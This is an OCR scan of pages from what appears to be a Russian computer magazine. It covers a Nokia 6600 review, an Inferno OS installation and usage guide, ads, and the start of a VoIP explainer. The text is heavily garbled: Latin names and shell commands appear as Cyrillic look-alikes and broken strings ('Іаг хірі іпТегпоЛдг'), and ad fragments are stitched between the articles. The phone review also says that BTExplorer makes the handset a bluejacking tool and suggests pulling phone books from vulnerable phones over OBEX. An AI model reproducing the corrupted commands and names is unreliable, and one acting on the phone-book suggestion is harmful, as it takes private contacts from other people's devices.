уши, и слушать музыку. 



У 6600 хороший, боль- 
шой и яркий экран. Экра- 
на вполне хватает, чтобы 
серфить обыкновенные 
НІтІ-сайты при помощи 
Орега. Например, стра- 
ница с результатами по- 
иска Яндекса отобража- 
ется замечательно. Гор- 
лум вообще не обламы- 
вается: читает в метро 
книжки прямо с экрана. 
На 6600 можно запросто 
смотреть видяшки, пока- 
зывать друзьям фотки. 



У мобильника хорошая 
камера, которой можно 
делать нормальные фот- 
ки. Это точно не тот слу- 
чай, когда камера нужна 
только как понтовый гла- 
зик, который добавляет 
40 баксов к цене и боль- 
ше не используется. Ес- 
ли ты отправишься весе- 
литься с друзьями и под 
рукой не окажется нор- 
мального цифровика, вы 
все равно не обломае- 
тесь: 6600 выручит. 



Это очень удобный телефон. 
Хорошо лежит в руке, замет- 
но меньше большинства дру- 
гих смартфонов. Корпус лег- 
ко поменять на любой дру- 
гой: 600 рублей и твой теле- 
фон не похож на все осталь- 
ные. Карты пямяти ММС сей- 
час стоят недорого, можно в 
телефон поставить хоть 512 
Мб и не париться над свобод- 
ным местом. Единственное 
несильное место - стандарт- 
ная батарейка. Но на 3 дня 
хватает, если не играть 24Н. 



Стоит только поставить на 
этот смартфон софтину вроде 
ВТЕхрІогег, как он сразу прив- 
ратиться в серьезное оружие 
блюджекера :). Ты сможешь 
сканировать окрестности, по- 
лучая имена и ВТ-адреса со- 
седних устройств, отсылать им 
сообщения, картинки и ѵсагсіз 
в любых количествах и даже 
просматривать список серви- 
сов устройства. Думаю, можно 
запросто научитьббОО и вытас- 
кивать через ОВЕХ телефонные 
книжки с дырявых телефонов. 
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АІ.2032ѴѴ 



Новейший монитор А12032ѴѴ был удостоен высшей 
награды ІпТегпаіюпаІ Рогит Оезгдп 2СЮ5 Т одной из самых 
престижных п мирно Зз- эту награду сражались 1900 
устройств от 740 производителей из 31 страны. Награда 
присуждается лишь в том случае, если устройство в нак* 
большей мере соответствует сразу нескольким критери- 
ям: дизайн, качество сборки, материал, инновацион- 
ность, экологическая безопасность, функциональность, 
эргономика, надежность и ценность торговой марки 



СЕТЕВАЯ 
ЛАБОРАТОРИЯ 



ІІСЕ 

кІГ АІ 

ГМІеІлѵогК 
ыаьогасогу 

ѵѵжѵѵ.пеІІаЬ.ги 

(095) 225 7575 








РС 20ІЧЕ 




ТЕХТ / НТТР://АМОР.РР.Ки / 



МАГИЧЕСКИЙ 

СВИТОК 



ІЫРЕВЫО — НОВОЕ ПОКОЛЕНИЕ ІІІЧІХ УЖЕ СЕЙЧАС! 



ІІ БОЛЬШИНСТВО СОВРЕМЕННЫХ ІІКІІХ-СИСТЕМ РАЗРАБАТЫВАЮТСЯ ДОСТАТОЧНО ДАВ- 
НО, И ОСНОВАНЫ НА ЕЩЕ БОЛЕЕ СТАРЫХ ОПЕРАЦИОННЫХ СИСТЕМАХ. ИХ УСТРОЙСТВО И 
ЛОГИКА РАБОТЫ ПРОДОЛЖАЕТ ОСНОВЫВАТЬСЯ НА ПРИНЦИПАХ, ЗАЛОЖЕННЫХ ЕЩЕ В 60-Е 
ГОДЫ ПРОШЛОГО ВЕКА, И ОНИ ПРОДОЛЖАЮТ РАЗВИВАТЬСЯ, НЕ ВНОСЯ КАКИХ-ЛИБО СУЩЕ- 
СТВЕННЫХ ИЗМЕНЕНИЙ В ПРИНЦИПЫ СВОЕЙ РАБОТЫ. СУЩЕСТВУЕТ ОПЕРАЦИОННАЯ СИС- 
ТЕМА, ПРЕДСТАВИТЕЛЬНИЦА НОВОГО ПОКОЛЕНИЯ ІІІЧІХ, ПОСТРОЕННАЯ С ИСПОЛЬЗОВАНИ- 
ЕМ СВЕЖИХ ИДЕЙ. ЕЕ ИМЯ — ІІЧЕЕРІЧОрр 



НОВЫЙ 

КОМПАКТНЫЙ 

ІІІЧІХ 



Іпіѳгпо — это компактная операционная система, создан- 
ная для разработки кроссплатформенных распределен- 
ных систем на большом количестве устройств и плат- 
форм. Разработчик операционной системы — компания 
Ѵііа ІЧыоѵа. Принципы устройства ІпТегпо базируются на 
разработках лаборатории ВеІІ І_аЬз. Іпіегпо распространя- 



ется по довольно сложной системе лицензирования: всего 
для разных компонентов используется четыре разных ли- 
цензии. Например, ядро системы распространяется по ли- 
цензии Ѵііа ІЧиоѵа Тгее-Тог-аМ, библиотеки виртуальной ма- 
шины и компилятора І_ітЬо — по І_СРІ_, а большинство 
приложений и сам компилятор — по (ЗРІ_. 



ПРИНЦИПЫ 

РАБОТЫ 



В основе функционирования ІпТегпо 
лежат три простых принципа. Первый 
принцип заключается в том, что все 
ресурсы, с которыми имеет дело 
ІпТегпо, представлены в виде файлов, 
и для получения доступа к ним необхо- 
димо использовать единое для всех 
видов ресурсов файловое АРІ. С точки 
зрения программирования, можно со- 
вершенно одинаково работать с про- 
цессами, сервисами, сетевыми ресур- 
сами и подключениями, а также с уст- 
ройствами хранения. На похожих 
принципах строятся все ІІпіх-системы. 
В этом заключается их существенное 
отличие от таких операционных сис- 



тем, как ѴѴіпбоѵѵз, в которых для фай- 
лов имеется свое АРІ, для реестра — 
другое, для процессов — третье и т.д. 
Файлы объединены в иерархическую 
файловую систему, и из этого вытекает 
второй принцип ІпТегпо: локальные и 
удаленные элементы файловой систе- 
мы могут соседствовать друг с другом, 
а их обработка ничем не отличается (с 
точки зрения прикладной программы). 
Из-за того, что не приходится выбирать 
метод доступа к файлу, значительно 
облегчается программирование сете- 
вых распределенных приложений. 
Третий принцип — это стандартный 
коммуникационный протокол. ІпТегпо 



имеет специальный протокол Зіух, 
служащий для доступа ко всем ресур- 
сам, с которыми работает программа, 
независимо от того, являются ли они 
локальными или удаленными. Нали- 
чие одного протокола позволяет уве- 
личить безопасность системы, так как 
Зіух поддерживает аутентификацию 
на основе сертификатов и шифрова- 
ние трафика. Зіух является частью 
операционной системы, поэтому при- 
ложениям не требуется явно его ис- 
пользовать, все происходит на более 
глубоком уровне. Зіух работает по- 
верх разных транспортных протоко- 
лов, таких как ТСР/ІР, АТМ и РРР. 



МУЛЬТИПЛАТ- 

ФОРМЕННОСТЬ 



Существует два варианта установки Іпіегпо. Первый вариант — обычная установка на жесткий диск компьютера. Второй 
вариант — установка операционной системы. Для этого не понадобится использовать РС-эмуляторы вроде ѵтѵѵаге, по- 
тому что средства для запуска под другой операционной системой уже встроены в Іпіегпо. Я рассмотрю здесь только 
второй вариант, так как он оптимален для ознакомления с новой ОС. Іпіегпо может запускаться практически под всеми 
распространенными на сегодняшний день платформами: конечно же, под ѴѴіпбоѵѵз, а также под 1_іпих, РгееВЗО и други- 
ми ІІпіх-совместимыми системами (Ігіх, Зоіагіз и даже МасОЗ X). Что касается ѴѴіпбоѵѵз, то пригодными для запуска ІпТегпо 
будут только системы, построенные на базе ядра ІЧТ: ѴѴіпбоѵѵз 2к, ХР и 2003. Платформа ѴѴіпЭх не поддерживается. 
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МУЛЬТИПЛАТ- 

ФОРМЕННОСТЬ 



Аппаратные платформы тоже представлены в списке совместимости в большом ассортименте: х86, Зрагс, МІРЗ, АРМ, 
НР-РА, РоѵѵегРС и другие. 

Для начала понадобится скачать с сайта операционной системы необходимые дистрибутивы. Страница для загрузки чет- 
вертой редакции дистрибутива ІпТегпо находится по адресу ѵѵѵѵѵѵ.ѵііапиоѵа.сот/іпіето/пеі боѵупІоаб4Т.ИітІ . Можно ска- 
чать образ установочного СО, на котором будут файлы, необходимые для установки на любую из вышеперечисленных 
платформ. Если же ты точно знаешь, на какую именно платформу ты будешь устанавливать ІпТегпо, а также если ты хо- 
чешь сэкономить на времени и трафике (ведь образ установочного СО весит почти 60 Мб, и его скачивание по модему 
может затянуться), то можно не скачивать все целиком, а загрузить только архив іпіегпо.ідг, в котором находится непос- 
редственно сама операционная система и дополнительно еще один архив, в котором будут находиться компоненты, не- 
обходимые для запуска на той или иной платформе. Эти два архива будут весить около 20 — 30 Мб. 



УСТАНОВКА 

НАІІМХ 



На моей машине установлена РгееВЗЭ 5.4, и я решил устано- 
вить ІпТегпо сначала на нее. Я скачал дистрибутив ІпТегпо и 
архив ЕгееВ801дг с официального сайта и приступил к уста- 
новке. Установка выглядит одинаково для всех ІІпіх-систем, 
так что описанную мной процедуру можно будет применить и 
к І_іпих тоже. Стоит отметить, что для установки на І_іпих дос- 
тупно для скачивания два отдельных файла: Ыпих.ідг и 
ОеЬіап.ідх. Из-за несоответствия версий библиотеки ОЫВС 
разработчики скомпилировали два разных установочных ис- 
полняемых файла. Если один из них отказывается запускать- 
ся, то следует попробовать использовать другой. В будущем 
разработчики надеются избавиться от этого недостатка и 
распространять единый установочный архив для І_іпих. 
Разработчики рекомендуют для начала завести для Іпіегпо 
отдельного пользователя и производить установку из него. 
Я обошелся без этого, выполнив установку из-под своего 
аккаунта. Надо положить два архива іпіегпо.ідх и 
РгееВЗЭ.Ідг в отдельный каталог (у меня он называется 
/ ііоте/атсІѴіпІегпо_іп8{аІІ ) и распаковать их. В ІІпіх-систе- 
мах следует использовать команду іаг с опцией -р, для то- 
го чтобы были выставлены корректные права доступа на 



распакованные файлы. В моем случае распаковка будет 
выглядеть так: 

$ Іаг хірі іпТегпоЛдг 
$ Іаг хгрТ РгееВЗЭ.Іді 

Теперь тебе надо решить, куда будет установлена Іпіегпо. 
Если ты создал для ІпТегпо отдельного пользователя, то 
можешь установить систему в его домашний каталог. 
Я пользователя не создавал, поэтому выбрал для установ- 
ки путь /изг/іпіегпо. В установочном каталоге есть папка 
іпзіаіі, в которой лежит установочный скрипт. Его имя сов- 
падает с названием платформы, на которую производится 
установка. В моем случае скрипт называется РгееВЗЭ- 
386.зР. Именно его необходимо запустить для установки. 
Скрипту надо передать единственный параметр, который 
содержит имя каталога, в который будет произведена ус- 
тановка. Вот как надо это делать: 

# ткбіг /изг/іпіегпо 

# зР /Роте/атбѴіпІегпо_іпз1аІІ/іпз1аІІ/РгееВЗО-386.зР 
/изг/іпіегпо 

Система установится в указанную папку. На этом установка 
закончена. 



На нашем диске ты найдешь дистрибутив ІпТегпо РоигШ ЕШІіоп с необходимыми Файлами для установки на все поддерживаемые платформы. 



УСТАНОВКА 
НА ѴѴІЫЭОѴѴЗ 



Для установки понадобятся архивы 
іпіето.ідх и М.ідх. Их следует распако- 
вать в отдельный каталог любым архи- 
ватором, который понимает формат 
дгір. ѴѴіпВАВ вполне подойдет. Надо 
проследить за тем, чтобы содержимое 
двух архивов было распаковано обяза- 
тельно в один и тот же каталог, а не в 
два разных, иначе инсталлятор не смо- 
жет найти собственные файлы. Далее 



следует найти в каталоге іпзіаіі файл 
зеШр.ехе и запустить его. Появится ок- 
но, в котором следует ввести путь для 
установки. После выбора каталога на- 
до нажать Епіег , и система установится. 
Если скачать с сайта образ загрузоч- 
ного диска, содержащего компонен- 
ты для всех платформ сразу, то уста- 
новка в этом случае незначительно 
отличается. Надо записать ізо-образ 



на болванку (или виртуально подклю- 
чить этот образ в качестве диска). 
Никакие архивы распаковывать не 
придется, так как компакт-диск уже 
будет содержать установочную ди- 
ректорию со всеми необходимыми 
файлами. Останется только зайти в 
эту папку и точно так же запустить от- 
туда установочный скрипт для той 
или иной платформы. 
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После установки сразу можно запус- 
кать Іпіегпо. В каталоге, куда была ус- 
тановлена система, должна находить- 
ся папка с названием платформы. В 
ней находятся исполняемые файлы, 
среди которых есть файл с именем 
етіі (в ѴѴіпбоѵѵз — ети.ехе) — его и 
надо запускать. После запуска появ- 
ляется консоль ІпТегпо с приглашени- 
ем ввода в виде точки с запятой. Те- 
перь ты можешь ввести какую-нибудь 
команду, например Із, чтобы посмот- 
реть список файлов и каталогов в том 
месте файловой системы, в которой 
ты находишься. Команды Іпіегпо во 
многом совпадают с командами ІІпіх- 
систем, так что юниксоиды сориенти- 
руются сразу. Работать с голой кон- 
солью неинтересно, поэтому надо по- 
пытаться запустить графический ин- 
терфейс. Делается это командой «; 
ѵѵт/ѵѵт» (далее все команды следует 



вводить непосредственно в самой 
ІпТегпо). В РгееВЗЭ в той же папке, в 
которой находится ети, лежит испол- 
няемый файл ѵѵт. Если его запустить, 
то графический интерфейс появляет- 
ся сразу же, правда, сначала вылеза- 
ет окно авторизации. Там нужно ввес- 
ти логин ІпТегпо (пароля нет), после 
чего тоже появляется рабочий стол. 
При запуске графического интер- 
фейса откроется новое окно, внутри 
которого будет рабочий стол серого 
цвета и серая же панель внизу, с не- 
ким подобием кнопки «Пуск». Интер- 
фейс ІпТегпо мне напомнил почему-то 
ѴѴіпбоѵѵз 98. Оформление кнопок и 
окон простое, без модных закруглен- 
ных углов и полупрозрачных меню. 
Заголовок окна выглядит привычно: 
синий прямоугольник и три стандарт- 
ные кнопки справа. Однако поведе- 
ние кнопки «развернуть» отличается. 



В ІпТегпо эта кнопка не сворачивает и 
разворачивает окно, а позволяет 
пользователю самому определить же- 
лаемый размер окна. При нажатии на 
кнопку текущее окно оказывается об- 
веденным красной рамкой. Если 
кликнуть внутри окна и двигать мыш- 
кой, удерживая клавишу нажатой, то 
размер окна меняется в ту сторону, к 
которой ближе всего был осущес- 
твлен клик. Если же кликнуть за пре- 
делами окна, то можно обозначить 
все той же красной рамкой новое 
расположение и размер окна. Когда 
кнопка мыши будет отпущена, окно 
займет новую позицию на экране. 
Сначала довольно непривычно, но за- 
тем привыкаешь. Кроме того, в диа- 
логовых окнах кнопка «ОК» распола- 
гается не в окне среди прочих кно- 
пок, а тоже в заголовке, рядом с кноп- 
кой «Закрыть». 



Теперь ты можешь открыть главное меню ІпТегпо и позна- 
комиться с некоторыми стандартными приложениями. В 
меню присутствуют пункты Рііез и ЗИеІІ — это файловый 
менеджер и командная строка. ЕсІіТ вызывает простой 
текстовый редактор. По своим возможностям он не пре- 
восходит виндовый КІоіерасІ, единственная дополнитель- 
ная функция в нем — это подсветка синтаксиса языка 
І_ітЬо. Пункт СНагоп вызывает интернет-браузер. При вве- 
дении любого в адресной строке адреса почему-то всегда 
открывался сайт, который запущен у меня на локальном 
сервере АрасИе. Судя по открывшейся странице, браузер 
не поддерживает С35 и баѵаЗсгірІ, зато нормально пока- 
зывает изображения и русский текст. 

В подменю Зузіет находятся системные утилиты: дебаг- 
гер, диспетчер задач и монитор памяти. Часы почему-то не 
располагаются на панели задач, как это обычно бывает, а 
запускаются в виде отдельного приложения СІоск, из под- 
меню Мізс. В этом же подменю находится программа 
Соіогз, демонстрирующая доступную в Іпіегпо палитру, а 
также странное приложение ІпТегпаІ СоІІее, представляю- 
щее собой окно с картинкой, по которой пляшут изобра- 
жения кофейников. Видимо, это демонстрация графичес- 
кой библиотеки Іпіегпо. Ну и наконец, меню (Затез. Там 
есть всего два пункта, один из которых — это игра Теігіз. 
Далеко не все программы Іпіегпо присутствуют в этом ме- 
ню. Запускать остальные следует из шелла Іпіегпо. Напри- 
мер, чтобы запустить игру «Сапер», следует набрать в ко- 
мандой строке «; ѵѵт/зѵѵеерег». Еще мне удалось найти иг- 
ры С4, «Реверси» и «Змейка». Из программ, демонстриру- 
ющих возможности ІпТегпо, можно взглянуть на РоІуТіебга, 
которая показывает в трехмерном режиме сложные вра- 
щающиеся геометрические фигуры с непроизносимыми 
названиями вроде дгеаі біігідопаі бобесісозібобесаИебгоп. 
Для работы с Интернетом, кроме браузера, есть еще две 



программы (геабтаіі и зепбтаіі), которые принимают и 
отправляют электронную почту. Обе программы имеют 
графический интерфейс. Присутствует так же программа 
Іеіпеі. 

ІпТегпо полностью поддерживает ІІпісобе (то, что я так и не 
нашел, как переключиться на какой-либо язык, отличный 
от английского, объясняется тем, что это просто еще не 
реализовано). В состав ІпТегпо включены шрифты с подде- 
ржкой латиницы, кириллицы, а также греческого и японс- 
кого языков. Просмотреть ІІпісосІе-таблицу можно в прог- 
рамме ипіЬгоѵѵзе. 

Мне захотелось попробовать открыть в ІпТегпо какие-ни- 
будь популярные форматы видео, аудио и изображений. 
Довольно быстро я нашел нужные программы: аѵі, ѵѵтріау 
и ѵіеѵѵ. Сначала я попытался посмотреть какой-нибудь ви- 
деоролик. К сожалению, ни один файл проиграть не уда- 
лось. Проигрыватель аѵі, после нажатия на кнопку ріау, 
каждый раз выдавал какую-либо ошибку. Дальше я попы- 
тался проиграть музыку в формате .ѵѵаѵ, в программе 
ѵѵтріау. К сожалению, этого тоже не удалось сделать, так 
как программа не опознала в подсунутом ей файле звуко- 
вой формат и отказалась проиграть его, выдав сообщение 
поі ап аисііо ТМе. Разумеется, моя неудача никак не свиде- 
тельствует о том, что ІпТегпо не подходит для мультимедий- 
ных задач. Это лишь говорит о качестве поставляемого 
вместе с системой программного обеспечения. Впрочем, с 
системой поставляется компилятор, а исходники больши- 
нства стандартных утилит открыты, так что любой может 
переделать программу так, чтобы работало, как следует. 
Зато с форматами графических файлов таких проблем не 
наблюдается. Программа ѵіеѵѵ поддерживает форматы діТ, 
Ірд, рпд, хЬт и Ь\Х (а вот привычного всем Ьтр почему-то 
нет). Предложенные программе файлы указанных форма- 
тов нормально открылись и отобразились. 




РАБОТА 

В ОПЕРАЦИОННОЙ 
СИСТЕМЕ 
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ОБЛАСТИ 

ПРИМЕНЕНИЯ 



Операционная система специально проектировалась с 
расчетом на открытость, переносимость и компактность, а 
это значит, что Іпіегпо пригодится везде, где требуются эти 
факторы. Компактность и большое количество поддержи- 
ваемых платформ окажется весьма кстати при использо- 
вании во встроенных системах. Графический интерфейс 
позволит использовать Іпіегпо в развлекательных целях. 
Внутреннее устройство, упрощающее работу с сетью, 
пригодится для запуска распределенных вычислений. В 
общем, возможности для применения ІпТегпо открываются 
широкие. Игровые и телевизионные приставки, смартфо- 
ны, мобильные компьютеры, банкоматы — на всем этом 
вполне можно работать в ІпТегпо. 



Открытость проекта позволит свободно улучшать и со- 
вершенствовать все входящие в нее компоненты, а так- 
же своевременно исправлять возникающие ошибки. 
Освоить Іпіегпо не составит труда всем желающим. 
В этом нам поможет встроенный графический интер- 
фейс. Юниксоиды найдут в ІпТегпо сходную систему ко- 
манд и прав доступа к файлам, а также организацию 
файловой системы. Программисты на С/С++/С# и Заѵа 
получат возможность выучить сходный по синтаксису 
язык ЫтЬо. Без сомнения, ІпТегпо очень интересный 
проект, за которым стоит следить. 

ВШАПѴ ѴОІЖ’8 ЛС 



ЯЗЫК ЫМВО 

Язьпс программирования ІітЪо был создан специально для программирования в среде Іпіегио. Он представляет 
собой видоизмененный диалект язьпса Си, в который встроены некоторые дополнительные возможности для эф- 
фективного использования возможностей операционной системы. Программа, написанная на ІітЪо, компилиру- 
ется в специальный байг-код виртуальной машины ПІ5 и может в дальнейшем исполняться в любом другом экзе- 
мпляре Іпіегио, независимо от того, на какой платформе эта операционная система будет запущена. Программа 
на ІітЪо состоит из модулей, которые подключаются с помощью директивы іпсіисіе, почти так же, как и в Си. 
Модуль состоит из двух секций, одна из которых содержит декларации функций, а другая - их реализации. Іиіегио 
имеет собственное АРІ, использовать которое можно, подключая к программе файлы модулей с расширением 
*.т. Подробнее о программировании на язьпсе ІітЪо можно познакомиться на странице 
\у\ѵ\ѵ. ѵкапиоѵа . сот /іпіегио /ІітЪо .Ъшгі. 









Официальная страница ІпГегпо — ѵѵѵѵѵѵ.ѵііапиоѵа.сот/іпіегпо. 

Язык ЫтЬо — ѵѵѵѵѵѵ.ѵіГапиоѵа.сот/іпГегпо/ІітЬо.ІіГтІ. 

Сайт на русском языке, посвященный операционным системам ІпГегпо и РІапЭ. — Іі1Ф://рІап9іпіегпо.пагоФги. 




интернѳт-браузѳр СІіагоп и программа РеасІтаіІ 




исходный код на языке ЫтЬо 
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Позови , когда будет 
мой любимый клип! 



Не волнуйся, я запишу. 
ККАтіАѴІѴЕА Ж 
Все может! п 
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/ІШъ. в МісгозоИ: 

1 ѴѴІПСІ0\Л/5 Х Р 

' Месііа СепТег Есііііоп 




ГЛАВНОЕ - это ИДЕЯ!!! 

Тебе нужен цифровой видеомагнитофон, 
фотоальбом, РѴР-проигрыватель, телик, 
радио, игровая приставка, трЗ и СР-плеер? 
Кгайхѵау ЮЕА МС с Місгозов \ѴіпсІо\Ѵ5 ХР 
Месііа Сепіег Есііііоп 2005 легко заменит тебе все это. 

И не забудь, что это еще и МОЩНЫЙ КОМПЬЮТЕР! 




ѵѵѵѵѵѵ. ІОЕАпм .ш 



СПРАШИВАЙТЕ В МАГАЗИНАХ ЭЛЕКТРОНИКИ! 



Кгайѵѵау является зарегистрированным товарным знаком «Крафтвэй корпорэйшн ПЛС» 
МісгозоГІ, ѴѴІпсІоѵѵз, логотип ѴѴіпсІоѵѵз ХР Месііа СепГег ЕсІІІІоп являются зарегистрирова 



^кгаПмеу' 

ТЕХНОЛОГИИ ДЛЯ ЛЮДЕЙ 



знаками корпорации МісгозоГІ и. 



е отделений в США и других страна* 









РС 2 ОІ\ІЕ 




ТЕХТ СТЕПАН ИЛЬИН / 8ТЕР@САМЕШШ.ПІІ / 




ІІ ОБЩЕНИЕ ГОЛОСОМ ЧЕРЕЗ ИНЕТ УЖЕ ДАВНО НЕ ДИКОВИНКА. ЗА ПОСЛЕДНИЙ ГОД 
НАМ ВСЕ УШИ ПРОЖУЖЖАЛИ ПО ПОВОДУ ЧУДО-ПРОГРАММЫ ЗКУРЕ И ЕЕ МНОГОЧИСЛЕН- 
НЫХ АНАЛОГОВ, КОТОРЫЕ ПОЧЕМУ-ТО СТАЛИ ПОЯВЛЯТЬСЯ КАК ГРИБЫ ПОСЛЕ ДОЖДЯ. ВО 
ВСЕХ КРУПНЫХ ГОРОДАХ СЕЙЧАС РАБОТАЕТ СРАЗУ НЕСКОЛЬКО АЛЬТЕРНАТИВНЫХ ОПЕРА- 
ТОРОВ СВЯЗИ, ПРЕДОСТАВЛЯЮЩИХ УСЛУГИ МЕЖДУНАРОДНОЙ И МЕЖДУГОРОДНЕЙ СВЯ- 
ЗИ ПО ЧРЕЗВЫЧАЙНО НИЗКИМ ТАРИФАМ. А В ОФИСАХ ВСЕ ЧАЩЕ МОЖНО ВСТРЕТИТЬ ТЕ- 
ЛЕФОНЫ, К КОТОРЫМ ВМЕСТО ОБЫЧНОГО ТЕЛЕФОННОГО КАБЕЛЯ ПОДКЛЮЧЕНА ВИТАЯ 
ПАРА. В ЭТОМ НЕТ НИЧЕГО УДИВИТЕЛЬНОГО: ТЕХНОЛОГИЯ ѴОІР НАБИРАЕТ ОБОРОТЫ, ПРИ- 
ЧЕМ ВО ВСЕХ СВОИХ ПРОЯВЛЕНИЯХ СРАЗУрр 



ПОЗНАКОМЬСЯ, 

ѴОІР 



СУТЬ ТЕХНОЛОГИИ ѴОІР НА ПАЛЬЦАХ 



Аббревиатура ѴоІР — это сокращение от Ѵоісе оѵег ІР. 
Своеобразная надстройка над распространенным прото- 
колом ТСР/ІР, позволяющая с помощью ІР-пакетов переда- 
вать оцифрованный голос. Ее не первый год используют 
для организации общения через инет в реальном времени, 
поэтому новой эту разработку не назовешь. Пакет с голо- 
сом при соблюдении некоторых условий (достаточной ши- 
рины канала, минимальных задержек и т.п.) вполне успеш- 
но транспортируются через Интернет, что предоставляет 
возможность быстро и дешево наладить связь между лю- 
быми абонентами, даже если один из них находится в Зим- 
бабве, а другой — на Аляске. Главное, чтобы каждый из 
них имел стабильный интернет-канал. 

Емкость телефонных станций сильно ограничена. После 
перехода на цифровые АТС это стало менее заметно, но 
несколько лет назад дозвониться в нужное место, скажем, 
под Новый год, было крайне проблематично. «Данное нап- 
равление перегружено» — хорошо знакомая фраза для 
тех, кто часто звонит по межгороду. Интернет, а значит, и 
ѴоІР подобных ограничений не имеет. Активное использо- 
вание динамической маршрутизации приводит к тому, что 



путь следования пакета от одного узла к другому не всег- 
да остается постоянным, особенно если рассматривае- 
мые узлы территориально далеки друг от друга. Если по 
какому-то направлению канал сильно загружен, то умные 
маршрутизаторы могут выбрать другой путь следования 
пакетов, который в данный момент будет оптимальным. 
Важна еще одна деталь. Пакеты с голосом (как, впрочем, 
и все остальные) никогда не передаются по одним и тем 
же каналам: они всегда распределены среди бесчислен- 
ного количества разнообразных маршрутов. 

Огромный плюс ІР-телефонии в том, что она значительно 
дешевле традиционной, особенно если речь идет о между- 
народных звонках. Обычные телефонные компании в 
большинстве своем являются монополистами, поэтому ус- 
танавливают довольно высокие тарифы. Более того, цена 
звонка зависит от того, кто звонит, куда, откуда, когда и 
каким образом. Тариф возрастает дискретно: ближе — 
дешевле, дальше — дороже. Что касается ѴоІР, то грани- 
ца между внутригородскими звонками и междугородними 
весьма прозрачна, так как ѴоІР-оператор передает все по 
относительно дешевым интернет-каналам. 
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пефона. Другими словами, аналого-цифровой преобразователь 





Для обычного пользователя технология ѴоІР может предс- 
тавляться по-разному. Поэтому и использовать он ее мо- 
жет также различными способами. 

Например, с помощью компьютера. В инете существует не- 
мало компаний, которые предлагают организовать голосо- 
вую связь между компьютерами. От пользователя при этом 
требуется совсем немногое: телефонная гарнитура (мик- 
рофон с наушниками), звуковая карта и доступ в Интернет, 
желательно широкополосный ОЗІ_ и т.п. Пример такой ком- 
пании — недавно нашумевшая Зкуре ( ѵѵѵѵѵѵ.зкѵре.сот Т По- 
добного рода провайдеры обычно не берут плату за соеди- 
нения типа компьютер-компьютер, поскольку связь уста- 
навливается между пользователями напрямую и не требует 
участия ѴоІР-шлюзов. С другой стороны, такие компании 
делают неплохие деньги на обслуживании звонков с компь- 
ютера на обычные городские телефоны. 

Второй вариант связан с применением специальных адапте- 
ров для аналоговых телефонов (АйА, Апаіод ТеІерИопе 
Абаріог). К такому устройству можно подключить самый обык- 
новенный телефон, с которым ты, вероятно, знаком всю свою 
сознательную жизнь, и вполне успешно использовать его для 



ѴоІР-телефонии. Адаптер представляет собой аналого-циф- 
ровой преобразователь (и наоборот), то есть необходим для 
того, чтобы преобразовать аналоговые сигналы, поступающие 
с трубки, в цифровой вид и отправлять через провайдера на 
ѴоІР-шлюз. При этом все необходимые настройки: параметры 
связи, адреса шлюза и т.п. — выдает оператор ІР-телефонии. 
ІР-телефон — это третий вариант для тех, кто хочет вос- 
пользоваться ѴоІР. Штуковина довольно экзотическая, но 
в будущем обещает стать основным средством для голо- 
сового общения. Внешне ІР-телефон ничем не отличается 
от обычного аналогового, но вместо привычного разъема 
ВШ1 1 на нем монтирован разъем ВШ45, точно такой же, 
как и на твоей сетевой карте. Такой телефон посредством 
витой пары напрямую подключается к роутеру в локаль- 
ной сети. Далее пакеты перенаправляются либо на внут- 
ренний ѴоІР-шлюз (если ѴоІР-связь налажена на внутрио- 
фисном уровне), либо на внешний шлюз ІР-телефонии, 
привязанный к какому-то конкретному телефонному опе- 
ратору. Уже сейчас можно найти прототипы ІР-телефонов 
с поддержкой ѴѴі-Рі, позволяющие абонентам ѴоІР совер- 
шать звонки, находясь в поле действия любого хотспота. 



НА 

ДЕЛЕ 



Для примера рассмотрим процесс ус- 
тановки соединения с помощью АТА- 
адаптера. Я не буду сейчас глубоко 
вдаваться в подробности, так как ос- 
новные принципы и протоколы будут 
рассмотрены ниже. 

1 Абонент берет трубку телефона, ко- 
торый подключен к АТА-адаптеру. 
Поскольку технология ѴоІР выполнена 
максимально прозрачно для пользо- 
вателя, он вряд ли заметит разницу по 
сравнению с обычной телефонной ли- 
нией. Здесь будут те же самые гудки, 
тот же принцип набора номера и т.д. 

2 Если соединение в Интернет уста- 
новлено, и АТА-девайс настроен кор- 
ректно, то в ответ пользователю бу- 
дет послан тональный сигнал. Его 
можно расшифровать, как «все в по- 
рядке, так что можно работать». 

3 Далее абонент, как обычно, вводит 
нужный ему номер с помощью тональ- 



ного набора. Цифры номера распоз- 
наются АТА-девайсом и временно за- 
писываются в специальный буфер. 

4 Как только все цифры номера набра- 
ны, формируется специальный пакет- 
запрос. Он отправляется в центр обра- 
ботки звонков (СаІІ Ргосеззог), который, 
как правило, представляет собой доро- 
гостоящее аппаратное решение, пред- 
назначенное для обслуживания прог- 
раммных коммутаторов (Зой Зѵѵіісбез). 
Последние содержат информацию о 
пользователях (имя юзера, его номер и 
привязанный ІР-адрес), а также управ- 
ляют процессом установки соединения. 

5 Первым делом центр обработки звон- 
ков проверяет правильность введенных 
данных. Если номер имеет некоррект- 
ный формат, то абоненту выдается со- 
ответствующее голосовое сообщение. 
Если же все в порядке, то осуществля- 
ется следующий этап — поиск по базе 



данных. Здесь все просто: ѴоІР-комму- 
татор ищет по своей базе ІР-адрес вы- 
зываемого абонента и пытается устано- 
вить с ним связь, то есть отправляет 
специальный пакет — «звонок». 

6 У второго абонента звонит телефон. 
После того как он возьмет трубку, меж- 
ду двумя абонентами будет установле- 
на сессия. Это значит, что каждая из 
сторон будет ждать пакетов с голосо- 
выми данными от другой. В течение 
всего разговора ѴоІР-устройства неп- 
рерывно обмениваются между собой 
пакетами, причем АТА занимается сра- 
зу двумя процессами: кодированием 
речи в цифровой вид и преобразовани- 
ем цифровых данных в аудиосигнал. 

7 Сессия заканчивается, если одна 
из сторон положит трубку. Однако 
связь может оборваться и по другим 
причинам, например, из-за потери 
связи с Интернетом. 
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Коммерческие предложения Зкуре в отношении звонков на 
обычные телефоны не очень выгодны. Сервис Уаііоо предлагает 
такие звонки: 1 цент за минуту (на территорию США) и 1.9 цента 
за минуту (на территорию еше 30 стран). Также за $3 в месяц 
или $30 в год можно выбрать номер УаИоо. на который к вам 
могут поступать входящие звонки. Это офигенное подспорье. 
если ты хочешь ориентироваться на западный рынок. 




Еще с незапамятных времен существовали программы, 
позволяющие записывать короткие голосовые сообщения 
и отправлять их по е-гпаіі. Так сказать, предшественники 
технологии ѴоІР. 



КОДИРОВАНИЕ 

ИНФОРМАЦИИ 



Какой бы тип соединения ѴоІР ни ис- 
пользовался, источником данных все- 
таки является человеческая речь. Важ- 
но понимать, что голосовые сообще- 
ния — это нечто аналоговое, которое 
нельзя просто взять и отправить через 
Сеть. Для этого нужно хотя бы предс- 
